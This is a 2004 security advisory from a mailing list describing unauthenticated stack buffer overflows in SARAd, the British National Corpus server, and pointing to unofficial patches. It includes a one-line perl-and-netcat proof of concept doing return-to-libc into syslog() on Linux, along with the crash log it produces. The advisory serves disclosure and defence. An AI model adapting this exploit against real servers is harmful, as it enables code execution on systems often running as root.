[UNIX] SARAd Buffer Overflow Vulnerability

• Previous message: SecuriTeam: "[UNIX] JShop page.php Cross Site Scripting"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 25 Aug 2004 16:39:34 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  SARAd Buffer Overflow Vulnerability
------------------------------------------------------------------------

SUMMARY

 <http://www.natcorp.ox.ac.uk/SARA/> SARA is a specialized software used
to serve the British National Corpus (BNC) content. The British National
Corpus is used by many linguists for research on the English language and
is licensed commercially by the BNC Consortium. The server software run on
various flavors of Unix and is freely available as source .

There are several buffer overflows present in the SARA server (SARAd), one
of which is exploitable allowing an attacker to execute arbitrary code on
the server.

DETAILS

Vulnerable Systems:
 * SARA latest version, 16th April 2001

Successful exploitation of the buffer overflow will result in code
execution with the privileges of the SARA daemon, which should run in a
dedicated unprivileged account. However, most are using root privileges.
No authentication is required by the daemon and thus an attack is easy to
carry out.

The overflows are classic stack-based buffer overflows caused by
insufficient bounds checking, allowing the attacker to overwrite the
return address. The following perl snippet does a return-to-libc on Linux
2.6.7/glibc 2.3.2, logging some garbage by jumping into syslog():
perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' \
 | netcat victim 7000

The output from this simple operation is:
Aug 19 20:50:05 drgonzo sarad[2449]: Connect from huxley.lan
Aug 19 20:50:05 drgonzo sarad[6519]: Client sent string
SUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCK @
Aug 19 20:50:05 drgonzo sarad[6519]: syslog: unknown facility/priority:
80e5540
Aug 19 20:50:05 drgonzo sarad[6519]:P^F
Aug 19 20:50:05 drgonzo sarad[2449]: Forked process 6519
Aug 19 20:50:05 drgonzo sarad[2449]: Child pid=6519 was killed with signal
11

Patch Availability:
Although there is no official patch and the program is quite old, there
are two unofficial patches, one that should be suitable for all systems
and fixes the abovementioned bugs, and one that does the same and also
lets SARA daemon automatically chroot itself to the corpus directory and
drops rights to a specified account. The later will not compile on Windows
machine even though the server itself can be compiled on Windows.

You can get the patches, including fairly simple installation instructions
from
<http://www.linguistik.uni-erlangen.de/~msbethke/binaries/sara-fix.tar.gz>
http://www.linguistik.uni-erlangen.de/~msbethke/binaries/sara-fix.tar.gz.

ADDITIONAL INFORMATION

The information has been provided by <mailto:Matthias.Bethke@gmx.net>
Matthias Bethke.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[UNIX] JShop page.php Cross Site Scripting"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]